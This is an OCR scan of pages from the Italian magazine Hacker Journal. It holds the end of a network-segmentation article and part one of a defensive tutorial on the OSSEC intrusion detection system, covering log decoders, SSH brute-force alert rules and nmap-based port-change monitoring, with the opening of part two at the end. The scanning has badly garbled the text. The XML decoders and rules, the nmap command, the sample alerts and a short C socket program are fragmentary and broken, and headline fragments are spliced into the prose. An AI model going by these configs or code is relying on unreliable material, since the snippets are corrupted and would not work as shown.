rete occorre sempre avere in mente 
il modello ISO/OSI. Bisogna posizio- 
narsi mentalmente al livello di riferi- 
mento, considerando il livello fisico 
sul gradino più basso ed il livello 
applicativo al livello più alto, passan- 


Rete Privata 


do per diversi strati gestiti da uno o 
più protocolli di comunicazione. 
Detto questo, fate molta attenzio- 
ne perché due o più subnet gestiti 

al livello 3 del protocollo TCP/IP 
possono tranquillamente condivide- 
re lo stesso segmento fisico di rete 
gestito dal secondo o primo livello. 
Infatti, è possibile utilizzare il me- 
desimo switch per gestire due 
diverse subnet, senza fare ricorso 
ad opzioni esotiche di qualche 
switch più costoso come ad esem- 
pio le LAN virtuali. In questo caso, i 
‘computer che appartengono ai due 
diversi gruppi potranno vedersi tra 
di loro ma non trasversalmente con 

i computer dell'altro gruppo. Per 
consentire l'apertura di un canale 

di comunicazione tra due computer 
‘appartenenti a due subnet diverse 
occorre configurare un router che 
generi un’appropriata tabella di in- 
stradamento e che abbia la possibili- 
tà di raggiungere un indirizzo TCP/IP 
di entrambe le subnet. 

Non occorre che il router abbia due 
schede di rete e che ciascuna di 
esse abbia l'indirizzo TCP/IP definito 
all'interno di ciascuna delle due sub- 
net. E' possibile anche configurare 
sulla medesima scheda del router 
due indirizzi TCP/IP ciascuno appar- 
tenente ad una delle due subnet ed il 
gioco è fatto. 


La rete può diventare 

molto complessa. In quella 
esemplificata in questa figura, 
qualcuno sulla rete pubblica 
potrebbe anche posizionare 
uno sniffer ma sarebbe 
pressoché impossibile 
visualizzare il traffico 

che va dalla sala server 

alla rete privata. 


BARRIERE 
HARDWARE 


Per rendere sicuro un segmen- 
to bisogna considerare prima 
gli altri segmenti a cui il primo 
è collegato. In un ufficio dove 
ci sono determinate regole per 
accedere, come ad esempio 
una sala server, è difficile in- 
stallare uno sniffer senza esse- 
re scoperti. Diverso è invece il 
caso di una sala pubblica dove 
è consentito il libero accesso. 
Pensiamo tipicamente ad una Uni- 
versità, dove esistono segmenti di 
Facoltà che dovrebbero rimanere 
privati e segmenti pubblici, come ad 
esempio la biblioteca, dove entra e 
si collega chiunque. 

Ovviamente, l’uso di strumenti come 
Firewall e simili sono praticamente 
un obbligo. Seguendo i fattori di 
costo e di performance sarebbe 
molto più semplice collegare tutte le 
macchine tra loro attraverso appa- 
rati economici, ma dal punto di vista 
della sicurezza questa soluzione è 
un pugno allo stomaco. 

In questo caso occorre racchiudere 
tutte le macchine ad accesso pub- 
blico in uno spazio ben delimitato, 
creando un solo ed unico collega- 
mento verso la sala server, adegua- 
tamente presidiato da un firewall. 

In questo caso, i dati che viaggiano 
sul segmento sicuro dovrebbero 
quasi certamente restare inviolati 
‘anche se ci sono moltissimi fat- ||| 
tori in gioco, come ad esempio la 
tipologia degli edifici, la distanza 
tra gli apparati di rete ed il numero 
di computer utilizzati. In ogni caso, 
ho usato il condizionale perché nel 
mondo dell’informatica, quando si 
parla di sicurezza, il condizionale è 
obbligatorio. 


Igiovanni.federico@isek.it' 
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BICUREZZA IN QUESTO ARTICOLO. SENTIAM 
PROCESSI DI DIFESA le 


UN’'INTRODUZIONE Al 


UTONOMI 


PER IL CONTROLLO DEL RISCHIO ED 


’esponenziale crescita del 
mercato che ruota attorno 
all’Information & Commu- 
nication Technologies ed il 
vistoso aumento di reti per 
l’interconnessione di sistemi infor- 
mativi, hanno delineato, nel corso 
degli anni, una radicale trasforma- 
zione del nostro modo di vivere 
che interessa ogni singola azione 
quotidiana. 
Alzarsi al mattino ed accompagnare 
il caffè leggendo la nostra casella di 
posta elettronica è un'operazione di 
prassi ormai, così come lo è gesti- 
re centinaia o migliaia di contatti 
attraverso i vari social network ed 
i moderni software di messaggeria 
istantanea. 


Se pensiamo poi ai sistemi di com- 
mercio elettronico, alla gestione 
dei conti correnti con un semplice 
click, all’opportunità di organizzare 
viaggi, prenotare aerei e quant'altro, 
giocare in borsa, pagare il casello 
‘autostradale e veicolare eccellen- 
temente pubblicità attraverso siti e 
portali, appare quantomeno scon- 
tato presumere che il mondo dei 
bit sia qualcosa di molto meno 
astratto ed avulso dalla realtà 
rispetto a quello che si potreb- 
be pensare. 


Questo fiorente mercato ha avuto 


modo di creare nuove opportunità 
di lavoro, vere e proprie figure pro- 


O 
(E 


ITORAGGIO DEI LOG CON OSSEC UTILIZZANDO è; 


fessionali che fino a qualche tempo 
fa non erano minimamente immagi- 
nabili. 


Se infatti fino a 20 anni fa la prero- 
gativa principale, in termini di risor 
se umane, di un'azienda di medio- 
alto livello era quella di avvalersi 

di un buon General Manager, ora 
risulta del tutto parificata, in termini 
di importanza aziendale, la figura 
dell'IT Manager. 


In virtù di questo processo simbio- 
tico tra uomo e macchina diviene 
chiaro percepire come l'interesse 
alle tematiche relative al mondo del- 
la sicurezza informatica avvolga un 
po' tutti, addetti ai lavori e non. 


Anche sfruttando questa forte 
richiesta è stato creato un modello 
di business da zero: basti pen- 
sare all’industria dei produttori di 
software antivirus, firewall, IDS e via 
dicendo e alla continua nascita di 
aziende che fanno della sicurezza 
dell’informazione, della privacy e 
della gestione del rischio il loro core 
business. 


Ma quali sono le metodologie 
generalmente adottate per mo- 
nitorare costantemente lo stato 
di sicurezza di un’intera infra- 
struttura IT ? Che cosa significa 
rendere sicura un’infrastruttura IT? 
Più in generale, cosa si intende con 


Rs = 


il termine “sicurezza” ? 


In un articolo proposto su HJ 194 
abbiamo introdotto i tre pilastri 
fondamentali dell'IT Security che 
riprendiamo anche in questa sede, 
ovvero: confidenzialità, integrità e 
disponibilità. 


Offrire sicurezza significa quindi 
governare il rischio in base ad 
un’organizzazione tecnica e logi- 
stica che tenga conto di questi tre 
inscindibili presupposti e che utilizzi 
tutte le risorse disponibili (umane, 
software e hardware) per farlo, pre- 
supponendo che: 


Gli host del nostro network debbano 
essere accessibili solo da parte di 
chi è autorizzato. 

Le informazioni in essi contenuti 
debbano essere modificabili solo 

da chi autorizzato secondo schemi 
e modalità definite dall’Amministra- 
tore. 

Debbano essere sempre accessibili 
da parte di chi è autorizzato. 


Il processo di Auditing si suddivi- 
de in fattore proattivo (analisi dei 
sistemi) e reattivo (sviluppo delle 
policy di sicurezza adeguate): 
individuare i principali punti focali 
del rischio, analizzando le maggiori 
criticità della nostra infrastruttura e 
sviluppando un'opportuna strategia 
di contenimento costituisce un 


attributo fondamentale del nostro 
percorso. 


Avendo già analizzato nel corso 

dei passati numeri della rivista le 
modalità di attacco alle quali i nostri 
sistemi sono esposti e le metodolo- 
gie generalmente adottate da parte 
di incursori per farvi breccia (fattore 
proattivo), focalizzeremo la nostra 
attenzione su uno degli aspetti 

più cruciali: la definizione delle 
politiche atte alla gestione del 
rischio (fattore reattivo), ricordan- 
doci che la protezione offerta deve 
essere direttamente proporzionale 
alle criticità rilevate in una prece- 
dente fase di auditing del nostro 
network, dall'interno e dall'esterno 
(valutando, quindi, le risposte ai 
penetration test effettuati). 


Vedremo quindi come i concetti alla 
base del corretto monitoraggio 
dei log possano permetterci di rice- 
vere un immediato riscontro delle in- 
formazioni gestite dai nostri sistemi 
individuando i principali campanelli 
di allarme e come, attraverso questi, 
bloccare sul nascere accessi 
non autorizzati e tentativi di 
incursione. 


Analizzeremo pertanto OSSEC, uno 
dei più potenti Host-based Intru- 
sion Detection System (HIDS) 
offerti dalla comunità del software 
libero osservando come, attraver- 
se l'ausilio del sistema operativo 
OpenBSD ediil suo firewall integra- 
to (PF) sia possibile realizzare un 
complesso ed autonomo mecca- 
nismo di protezione perimetrale 


della nostra rete e degli host 
che la compongono. 


SCENARIO 

[soon] 
Considerata la totale promiscuità 
che caratterizza le reti di qualsiasi 
contesto aziendale medio/grande, 
ci preoccuperemo di realizzare una 
soluzione che trovi spazio in qual- 
siasi scenario lavorativo e che ben 
si presti ad essere interoperabile 
con svariate tipologie di OS ed 
architetture. 


Nella fattispecie analizzeremo una 
classica situazione operativa dove 
vedono configurarsi: un web server 
Apache, un servizio FTP, accesso 
SSH abilitato su n host, vari client 


Microsoft Windows 
e GNU/Linux, un file/ 
print server gestito 
con Samba, uno 0 
più server di posta 
elettronica ed un 
server MySQL. 


Opteremo pertanto 

per una configura- 
zione dell’HIDS di 

tipo client/server 

(di seguito “c/s”) 
demandando la ge- 
stione delle regole di 
filtraggio e degli alert 
ricevuti ad una macchi- 
na montante OpenBSD 4.6. 


Ci occuperemo, in una seconda 
fase, di rendere perfettamente sin- 
croni gli operati di PF e di OSSEC 
evidenziando come sia possibile, 
attraverso quella che è definita mo- 
dalità “Active Response”, rendere 
le operazioni di log monitoring e 
blocco degli attacchi real-time per- 
fettamente autonome. 


ANALISI DEI LOG 

e 1] ] 2— eee 
Sviluppato da Trend Micro e dispo- 
nibile con licenza GPL, al momento 
della scrittura di questo articolo, 


l’ultima versione di OSSEC 
disponibile per il download è la 
2.3. 


L’applicativo, in versione Client, fun- 
ziona su sistemi operativi Microsoft 
Windows, GNU/Linux, Solaris, BSD, 
AIX ed HP/UX. Per quanto riguarda 
il Server, invece, la compatibilità è 
assicurata solo per OS Unix-like. 


Prima di procedere con l’installa- 
zione del server e degli agenti sui 
nostri host (cosa che demanderemo 
‘al prossimo numero della rivista) è 
necessario chiarire come l’applica- 
tivo suddivide il proprio lavoro in 
modo estremamente modulare. 


AI momento dell’avvio OSSEC, 
infatti, definisce un set di demoni 
attivi sulla macchina con privilegi 
limitati al loro specifico uso: ognuno 
‘occuperà una specifica funzione. 


OSSEC Anatysisd 

Questo modulo costituisce il cuore 
dell'applicativo occupandosi, come 
il nome stesso suggerisce, dell’ana- 
lisi dei log e degli eventi (tra poco 
vedremo su che presupposti e come 
è basata l’indagine sui log). 
Nell’installazione c/s il processo è 
collocato esclusivamente sul Server 
(che si presuppone essere total- 
mente dedicato a questo utilizzo) la- 
sciando le risorse per gli applicativi 
‘operanti sui nostri client immutate. 
Nelle installazioni standalone è 
invece naturalmente avviato anche 
sui client (con un aggravio in termini 
di risorse). 


OSSEC Agentd 

Attivo sui nostri client, si occupa di 
inviare le informazioni necessarie 
all'espletamento dell’analisi dei log 
al Server. Nell’installazione c/s è 
naturalmente collocato all’interno 
dell’agente (e quindi del Client). 


OSSEC Remoted 

Disponibile sul server nell’installa- 
zione c/s, si occupa di coordinare le 
‘comunicazioni tra gli agenti (client) 
ed il server interfacciandosi diret- 


Di seguito schematizzato il contesto operativo 
«he analizzeremo nel corso del presente articolo] 
e la modalità di funzionamento dell’HIDS. 


tamente al modulo 
Analysisd per la suc- 
cessiva verifica ed 
analisi delle informa- 
zioni ricevute dagli 
host della rete. 


OSSEC Monitord 
Compito del modulo 
è quello di controlla- 
re l'operato dei client 
(Agenti) ed archiviare 
tutti i log centralizza- 
ti prodotti in appositi 
archivi giornalieri. 


OSSEC Log collector 
Interfacciandosi con Monitord 
rappresenta l'effettivo worker atto 
al recupero dei log; per questo è 
naturalmente avviato con privilegi 
amministrativi. 


OSSEC Execd 

e Maild 

Com'è facile intuire, questi ultimi 
moduli si occupano dell’invio degli 
alert via posta elettronica (vedremo 
di seguito come) e dell’attivazione 
dei processi di difesa necessari, 
identificati in OSSEC sotto il nome 
di “Active response” (attivazione del 
firewall, inserimento host attaccanti 
in hosts.deny, scrittura delle regole 
di filtraggio opportune in caso di 
attacco direttamente nel file di con- 
figurazione del firewall). 


Risulta a questo punto facile com- 
prendere come il processo di log 
monitoring effettuato da OSSEC 
poggi le basi su un’efficiente strate- 
gia modulare all'interno della quale 
si colloca un'intera catena produtti- 
va che tiene conto del recupero dei 
log (log collector), dell'invio di questi 
ultimi al server (agentd e remoted), 
dell'analisi degli stessi (analysisd), 
della segnalazione tempestiva delle 
criticità rilevate (maild) e dell’at- 
tivazione di meccanismi di difesa 
autonomi secondo schemi e modali- 
tà prefissate (execd). 


Quest’ultimo:punto trasforma di 
fatto l’applicativo da IDS ad IPS. 
Torneremo sull’argomento anche 
riprendendo alcuni concetti relativi a 
PF già visti nei numeri passati della 
rivista. 


DECODERS 


O TEO 
Tutti sappiamo che i file di log 
possono contenere una quantità di 
informazioni considerevole e che 
non tutte ‘sono di nostro interesse. 
Avere un sistema centralizzato di log 
monitoring può rendere sicuramen- 
te l’analisi delle stesse molto più 
efficiente e permetterci di avere un 
quadro della situazione circostan- 
ziale mirato ed aggiornato in tempo 
reale. Ma come è reso possibile ciò? 


Il parsing dei log è effettuato come 
abbiamo detto pocanzi dall'apposito 
modulo “Analysisd” in stretta siner- 
gia con i dati raccolti dai vari agenti. 
Approfondiamo quindi il discorso 
vedendo come sia effettivamente 
effettuata l'analisi delle informazioni 
raccolte. 


Il processo è suddiviso in tre singole 
fasi: pre-decodifica, decodifica 
ed analisi. 


Nella prima, le informazi ri- 
cevute dai singoli agen dal 
server stesso sono parsate dal 
demone alla ricerca di “informa- 
zioni chiave” quali orario, nome 
dell'applicazione, nome del sistema. 


Nella seconda e terza fase viene 
analizzata, attraverso l'utilizzo di 
espressioni regolari, la restante 
parte del log nel dettaglio alla 
ricerca di informazioni quanto 
più esaustive possibili riguardo 

ificato semantico dei ri- 
levati (indirizzi ip, userna- 
me, errori, etc.). 


Per capire meglio, esaminiamo un 
tipico decoder, nella fattispecie 


quello relativo al server web Apa- 
che, comprendendone il significato 
€ l'impostazione: 


«decoder n-wie="apache-errorlog”. 
SPEOG Am nam ] 
PIOGFam_name> 


A 


<prematch offse 
parent“>*[client 

<regex offset r 
match“>* {\d+.\d+.\di.\d, 
regex> 

<order>srcipe/orde: 
</decoder> 


Il primo blocco di istruzioni identi- 
fica univocamente l’applicativo di 
nostro interesse da tenere “sotto 
controllo”: in questo caso, trattan- 
dosi di Apache, saranno presi in 
considerazione i processi identificati 
dal nome “httpd”. 


Nel secondo blocco sono definite le 
operazioni di decodifica accennate 
prima; sono infatti analizzate le in- 
formazioni da monitorare all’interno 
dei log di errore del web server Apa- 
che che rispondano a tre determina- 
te regexp (warn, notice ed error). 


Nel terzo ed ultimo blocco si con- 
figura la ricerca dell’IP all’interno 

del medesimo file di log solo dopo 
l’analisi condotta dal secondo 
blocco e solo se vi sia presente un 
chiaro riferimento all'indirizzo stesso 
([client MPA ]). 


Se analizziamo brevemente un tipi- 
co stralcio di log di Apache diventa 
molto più semplice capire il signi- 
ficato del decoder e la sua doppia 


analisi con regexp: 


(eri Mar £ 
tor] 


does not 


23:15:03) 2010] [er 


fellient 93%%*.247.+*] File 


exist: 


Risulta evidente a questo punto 
il senso delle espressioni regola- 

: nella prima parte ([Fri Mar 5 
5:02 2010]) troviamo un chia- 
rissimo riscontro orario (oggetto di 
analisi nel processo di pre-decodifi- 
ca); nella seconda ([erxor]) trovia- 
mo una delle tre opzioni contempla- 
te nel secondo blocco del decoder 
ed oggetto dell'analisi di decodifica 
relativa alla tipologia del messaggio 
(in questo caso di errore); nella terza 
([client 93.**.247.#*]) si comple- 
ta il processo di decodifica avendo 
individuato anche l’IP di provenien- 
za attraverso l’ok ricevuto dall’ap- 
posita regexp; nella quarta ed ultima 
parte si snoda il processo di analisi 
semantica (il significato del messag- 
gio è reso chiaro direttamente dal 
testo che accompagna il log: “File 
does noti exist"). 


Come facilmente intuibile, risulta de- 
cisamente semplice creare decoder 
in formato XML contenenti espres- 
sioni regolari personalizzate per 
software specifico o semplicemente 
per analizzare dettagliatamente 
eventi e file. 


LIVELLI DI ALLERTA 
III NZ PIU ELIA 
Fin qui abbiamo definito tutto il 
necessario per capire il modo di 
interfacciarsi ai software da par- 

te dell'applicativo completando il 
discorso alla base del monitoraggio 
dei log. Ma OSSEC è ben altro e 
consente di stendere un profilo del 
rischio attraverso i riscontri ricevuti 
dall’analisi dei log definendo op- 
portuni “livelli di allerta” crescenti in 
base alle problematiche riscontrate. 


L'operato dell’applicativo è infat- 


ti disciplinato da un set di regole 
predefinito. 


Il formato utilizzato per la definizio- 
ne del modello di lettura e analisi 
dei log è anche in questo caso il co- 
mune XML e trovano spazio schemi 
pronti all'uso per la quasi totalità 
dei software Open Source (Apache, 
Mysal, Squid, Sendmail, Samba) e 
buona fetta di soluzioni commerciali 
come Antivirus, MS Exchange e 
firewall (vedi box). 


BOX #1: BUILT-IN RULES PRESENTI 
NELL'INSTALLAZIONE DI BASE 


\pache ru i 


soni.cw ul i 
arpwatch_rules.xm 
named ru ml 
pamd_ru cen 


creenfw rule n 
rid _ru xinl 


ngimxsrulesi ml 
shd rules.xml 


mantec-av_rulk 
ourier rules.xm 
pam_rules.xml 
ymantec-Ww le 
lovecot_rules.xm 
php_rules.xml 
valog_rul nl 
firewall_rn xm 
pia rutes.xnI 
telnobdrifes. xml 
ftpd rules, xml 


solicy ru nl 


imapd_rules.xml 
proftpd_rules.xml 
vinware rules. xml 
local_rules.xml 
pure-ftpd rules.xm 
vpn_concentrator_rules.xml 


mailscanner_rules.xml 


racoon_rules,xml 


Senza perderci in inutili chiacchiere 
consideriamo come prima un esem- 
pio pratico (stavolta con SSH) ed 
una delle tante regole predefinite dal 
software (sshd rules.xml). 


Prima di procedere introduciamo 
però alcune nozioni di base che:ci 
consentiranno di capire meglio i 
discorsi a seguire. 


Ogni regola definita con OSSEC pre- 
vede un identificativo unico variabile 
da 100 a 99999. 

Il livello di allerta definibile sulla 
singola regola varia da un minimo 
di 0 ad un massimo di 15 (in ordine. 
ovviamente crescente rispetto al 
rischio individuato). 

Qualora non volessimo essere 
informati circa un riscontro ad una 
determinata regola è in ogni caso 
possibile definire l'apposita opzione 
“noalert”, indipendentemente dal 
livello di allerta stabilito. 

Per limitare l'insorgenza di falsi 
positivi è possibile definire alcuni 
parametri specifici: è ad esempio 
consigliabile individuare una certa 
frequenza nei log prima di generare 
un alert attraverso l'apposita opzio- 
ne “frequency” così come potrebbe 
essere interessante analizzare spe- 
cifici archi temporali tra un errore e 
l’altro con la direttiva “timeframe”. 
Generato un alert, è inutile generar- 
ne un'altro per la stessa evenienza 
in un arco temporale ristretto che 
presupporrebbe lo stesso riscontro; 


a tal fine può rivelarsi utile l'adozio- 
ne della direttiva “ignore” nel corpo 
della regola. 


Detto questo, passiamo all'analisi 

di una delle tante regole per SSH, 
come sopra menzionato, che meglio 
chiarifichi i punti appena citati, 
occupandosi, nello specifico, di in- 
dividuare i tentativi di accessi brute 
force (più in là vedremo anche come 
bloccarli sul nascere): 


<decoded_as>sshd</deco 


In questo primo blocco definiamo 
l’id univoco da assegnare ad un 
semplice contenitore di messaggi 
relativi a SSH (e quindi indentifi- 

cati attraverso l'apposito decoder, 
come visibile alla seconda riga) 
definendo un livello di allerta minimo 
(level=”0”) e la non notifica dello 
stesso (noalert=”1”). 


Questo ci servirà per realizzare 
alcune regole “a catena” attraverso 
l'apposita direttiva “if_sid” che ve- 
dremo di seguito. In altre parole, 
realizzeremo un set ‘egole 
concatenato del tipo: 


1- Processo SSH attivo (no alert) - 
ID: 5700 

2 - Login (no alert) 

3 - Login errato (primo alert, sem- 
plicemente: “Accesso negato”) - ID: 
5710<> 5700 

4 - Fino al quinto login errato nell’ar- 
co di 2 minuti, stesso IP (stesso 
discorso) - ID: 5710 < > 5700 

5 - Sesto login errato in 2 minuti, 
stesso IP (nuovo alert, brute force in 
corso) - ID: 5712<> 5710<> 5700 


Procediamo quindi con il secondo 
blocco (punto 3:del nostro set di 
regole): 


5710" level="5"5 
<ifsid>5700</if_sid> 
match>illegal 

user|invalid user</mateh> 
<description>Artempt tox 

login using.a noncexistene 

\ser</description> 
<group>invalia:=» 

login, authentication faited,</ 


<rule id= 


Qui definiamo il primo alert genera- 
to in caso di login errato. Vediamo 
quindi l'uso della direttiva “if_sid” 
‘accennata prima, volta a definire 

la relazione di dipendenza con la 
regola 5700 (del resto, un errore 
relativo all'autenticazione su SSH 
difficilmente potrebbe generarsi se il 
servizio non fosse attivo). 


Attraverso la direttiva “match” scri- 
viamo quindi l’apposita espressione 
regolare finalizzata all’identificazione 
della problematica in essere. Questa 
definisce esattamente le parole da 
ricercare all’interno dei log generati 
dal software preso in considerazio- 
ne (in questo caso SSHd) affinché 
sia richiamata la regola stessa. 


Nel tag “description” invece offria- 
mo una descrizione di significato 
compiuto che sarà poi riportata 
sull’alert vero e proprio. In ultima 
istanza, alla voce “group”, definia- 
mo la tipologia entro cui la regola 
prende forma. 


Vediamo quindi l’ultimo blocco (pun- 
to 5 del nostro set di regole): 


<rule 
frequency 


failures,</gr 


</rule> 


Per questo blocco (che rappresenta 
sostanzialmente un'integrazione del 
secondo), come ci aspettavamo, la 
relazione di dipendenza è impostata 
con la regola 5710 ma stavolta è 

più forte, ereditando attraverso la 
direttiva “if_matched_sid" tutto il 
corpo-regola definito prima ed ag- 
giungendo ulteriori specifiche. 


Presenta un livello di allerta ele- 
vato (10) e viene attivata uni- 
camente dopo 6 riscontri alla 

regola 5710 (frequency="6”) 
generati in una frazione di 2 minuti 
(timeframe=’”120”) . 

Scattato l’alert, infine, il sistema non 
riconsidererà la regola per un minu- 
to (ignore="60”). 


L'utilizzo della direttiva “same 
source_ip" determina l’attivazio- 
ne del blocco solo in presenza di 
richieste provenienti dallo stesso IP. 
| tag “description” e “group” si com- 
mentano a questo punto da soli. 


L’ALERT GENERATO 


[occ ec--"@@ 
In tre semplici passaggi abbiamo 
definito una precisa metodologia 
per l'individuazione dei tentativi di 
accesso non autorizzati via SSH ai 
nostri host. Vediamo quindi un tipico 
alert inviato dal demone “maild” alla 
nostra casella di posta elettronica 
durante un tentativo di attacco brute 
force: 


sshd 


from 


sshd[5382] 


sshd [295 


invalid user 
127.207 port 


sshd[29559] ; 


som 


w sshd[19892]: 


Come immaginavamo, nell’alett, ol- 
tre i dettagli del caso, è riportato un 
chiaro riferimento alla regola 5712 
(evidenziato). 


Viene quindi successivamente 
riportato lo spezzone di error log 
del web server incriminato, utile per 
identificare all'istante orari ed IP di 
provenienza dell'attacco. Senz'altro 
utile, no ? 


REGOLE AD HOC 

isti neve 
‘Ora che abbiamo capito come 
funziona l'architettura dell’applica- 
tivo e su che schemi poggia il suo 
funzionamento possiamo lanciarci 
finalmente nella parte più creativa 
dell'articolo: la scrittura di regole 
personalizzate. 


In questa sede vedremo, a titolo 
esclusivamente esemplificativo, 
come sia possibile scrivere una 
specifica regola che ci consenta 

di monitorare costantemente le 
porte aperte su un determinato host 
(interno o esterno alla rete) utilizzan- 
do il comodo e semplice nmap ed 
interfacciandolo con l'HIDS. 


L'applicativo infatti è in grado di 
leggere senza alcun problema i log 
in formato grepable (da nmap: “0G 
nomefile”) di nmap come qualunque 
altro log di sistema. 


Gli alert saranno quindi generati nel 
formato standard OSSEC ed inviati 
periodicamente via posta elettroni- 
ca ogni qualvolta subentrino nuove 
informazioni interessanti (porte 
‘aperte ma precedentemente chiuse 
o viceversa). 


Per i più pigri, ricordiamo che tutti i 
file XML di seguito analizzati sono 
disponibili online al sito www.ha- 
ckerjournal.it. 


SCANSIONE HOST 


Per la scansione dell’host (in questo 
caso interno alla rete e precisa- 
mente 192.168.1.100) opteremo per 
l'analisi delle porte UDP e TCP via 
connecti() utilizzando l'interfaccia di 
rete interna del firewall (nel nostro 
caso “em0”) ed esportando il risul- 
tato su un file di testo (“/var/log/ 
nmap.log”) che sarà poi analizzato 
da OSSEC: 


-append_output 


ar/log/nnap. log 


Testiamo in prima battuta il fun- 
zionamento di nmap, ottenendo il 
consueto report: 


Aggiungiamo quindi una riga alla 
crontab del sistema che si occupi di 
avviare nmap ogni 30 minuti: 


$ sudo crontab -e 


Segnaliamo ora ad OSSEC il per- 
corso relativo al file generato 
specificando nel tag “log format" 
la stringa nmapg; ciò farà intendere 
all'HIDS che si tratta di output in 
formato grepable di nmap: 


Dopo un necessario riavvio di 
OSSEC, una rapida occhiata agli 
alert ci conferma immediatamente la 
riuscita dell'opera: 


pen 


Se invece siamo restii alla shell, una 
mail inviata dal sistema ci notifi- 
cherà immediatamente le stesse 
informazioni: 


momento in cui, sempre sull’host 
considerato, viene aperta un’ul- 
teriore porta rispetto a quelle 
identificate dal primo alert. 
Proviamo, banalmente, ad aprire 
la porta 50000 con un samplice 
script: 


et/in.h 


int main() { 
int s, 


struct in s 


addr, caddr; 


int ‘c_len = sizeof (c_ 


s addr.sin family = AF 


s_addr 


bind (s, (struct 


addr*)&s addr,siz 


bind 


Puntuale come un orologio svizze- 
ro, scattata la mezzora del cronjob 
definito prima, un apposito alert ci 
informerà sia da shell che via posta 
elettronica circa il cambiamento 
avvenuto rispetto alle porte inizial- 
mente aperte sull’host: 


var/ossec/logs 


0178597693 


159 www->/var 


formation chafiaed.? 

Src IP: (nogi@) 

(nonéì 

92.168,1,100 .(), open 
ports: 185(tep) ‘50000 (tap) 


lost: 


Per finire, vediamo come sono de- 
finite le regole 580 e 581 oggetto di 
questi alert: È 
<rule id="580" level=#g#> 
<category>0ssece/ 
category$ 
<decoded asshostinfo_ 
modified d/decoded as 
«description>Host infor 
mation changedie/desoripraone 
<group>lostànto,</gronps 
/rule» 


rule id="581’‘levelamata 
<category30ssece/ 
category> 
<decoded_as>hostinfo_ 
new</decodedalass 
<descriptionsHost 
information ladaed.</descriptions 
<«group>hostinfo, </group> 
</rule> 


Il lettore, a questo punto, dovrebbe 
essere autonomamente in grado di 
interpretare il significato di queste 
due semplici regole. 


Risulta quasi lapalissiano dire che 
l'unico freno imposto nella realizza- 
zione di regole ad hoc è la nostra 
fantasia; come abbiamo avuto modo 
di vedere, OSSEC è un applicativo 
di comprovate possibilità e risulta 
facilmente modellabile. 


Il lettore avrà sicuramente percepito 
i margini di applicazione dell’HIDS 
e la totale capacità di adattamento 
a contesti di qualsiasi dimensione e 
natura. 


La documentazione offerta online 
inoltre è notevole; possiamo trovare 
spunti ed approfondimenti per qual- 
siasi evenienza con una semplice 
ricerca. 


are rr 
CONCLUSIONI 
energie 

No, non ci siamo dimenticati di illustra- 

re i passi necessari al setup del server 

‘e dei vari agenti. 

Semplicemente, in questa prima parte 

dell'articolo, abbiamo preferire offrire 

una trattazione ampia tesa soprattutto 

all’introduzione dell’HIDS ed al suo 

funzionamento nel dettaglio. 


Assodato ciò, risulterà sicuramente 
più facile ed immediato per il lettore 
comprendere come operativamente 
costruire lo scenario definito in questa 
sede nel dorso del prossimo numero 
della rivista. 


Peri più impazienti, come sempre, 
segnaliamo il forum ed il canale IRC 
della rivista (irc.azzurra.org - #ha- 
ckerjournal). Entrambi costituiscono il 
miglior posto dove richiedere maggiori 
informazioni e trovar risposta alle 
proprie domande confrontandosi con 
gli autori e la community. 


Concludiamo quindi la prima parte 
della nostra trattazione offrendo alcuni 
‘opportuni riferimenti citati ed utilizzati 
‘anche durante la scrittura di quest’ulti- 
ma (vedi box). 


BOX #2: RIFERIMENTI I PARTE 


Website relativi agli applicativi ed i 
sistemi operativi analizzati: 


Trend Micro?" OSSEC: www.ossec.net 
OpenBSD: www.openbsd.org 

Nmap: www.nmap.org 

Apache httpd: httpd.apache.org 
OpenSSH: www.openssh.com 


Alcune riferimenti online utili: 


OSSEC Manual: www.ossec.net/main/ma- 
nual/ 


Regexp: en.wikipedia.org/wiki/Regular_ex- 


pression 

Beej's guide to Network Programming: beej. 
us/guide/bgnet/ 

Nmap official project guide to Network 
Discovery and Security Scanning: nmap.org/ 


book/toc.html 


Extensible Markup Language (XML): www. 
w3.org/XMLI 

IDS and IPS placement for Network Protec- 
tion (by R. Drum, ISC CISSP): tiny.cc/GJcfn 
OpenBSD 4.6 Installation Guide: www.openb- 
“sdiorgliaglfag4.html 


Ulteriori riferimenti: 


OSSEC Host-Based Intrusion Detection 
Guide by A. Hay, D. Cid, R. Bray (editore 
Syngress): tiny.cc/DFamX 

Hacker Journal nr. 188 - “Protezione totale” 
Hacker Journal nr, 194 - “Probing & Penetra- 
tion testing” 

Hacker Journal nr. 197 - “Introduzione ad 
OpenBSD” 


PROSSIMAMENTE 
II IZIZI TA AIA 
Esauriti i necessari richiami teorici af- 
frontati durante il corso dell’articolo, 

vedremo come si configura il vero e 
proprio processo di difesa autonomo 
accennato nel medesimo.ì 
Focalizzeremo pertanto la nostra 
attenzione sulla modalità “Active re- 
sponse” dell’applicativo, spostando 

i margini di applicazione dello stesso 
da Intrusion Detection System (IDS) 
ad Intrusion Prevention System (IPS). 
In quest'ottica risulterà obbligatorio 
rispolverare alcune nozioni già intro- 
dotte nel corso dei numeri passati 
della rivista relative a PF, vedendo 
come integrarlo al meccanismo A.R. 
di OSSEC. 


Sarà inoltre messa sotto i riflettori 
anche la comoda interfaccia web 
dell’applicativo e l'integrazione del 
meccanismo di alerting a database 
MySQL: sicuramente un modo molto 
più comodo di accedere alle infor- 
mazioni di nostro interesse rispetto 
quanto visto finora. 


Concludendo, testeremo quanto rea- 
lizzato in entrambe le parti attraverso 
la programmazione di attacchi mirati 
ai singoli host della rete utilizzando 
prevalentemente software Open 
Source. 


(difGiovanni Federico) 
giovanni.federico@isek.it 
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OSSEG a, © % 


Conclusa la necessaria trat- 
tazione teorica nel corso del 
precedente numero della rivista, 
= 1 masini sci 
initivamente operati- 
IL DISCORSO relase 
IL DISLURISO, Prima di iniziare stendi i 
INTRAPRESO cn marne 
NELLO SCORSO seguito. : ARIA | 
NUMERO e 
N preoccuperemo di in: sul 
DELLA RIVISTA server (che ricordiamo essere OpenBSD 
RELATIVO 4.6) configurandolo fedelmente rispetto 


a quanto detto nella precedente puntata. 
Sarà inoltre comodo installare l’inter- 
faccia web (ossec-wui) direttamente in 
questo passaggio, rendendola immedia- 
tamente funzionale. 


eten 


EVOLUTI HIDS 


DEFERTI DALLA Vedremo quindi come abilitare effetti 
COMUNITA DEL vamente i processi di difesa autonomi 
FTW. attraverso la modalità “Active Response” 
SMETWARE dell’HIDS e come configurare la stessa 
LIBERO. BUONA coni firewall di sistema (PF). Passeremo 
LETTURA! quindi all’installazione dei vari agenti sugli 


host della nostra rete. 

Infine, testeremo il lavoro svolto pianifi- 
cando alcuni attacchi generici diretti sia 
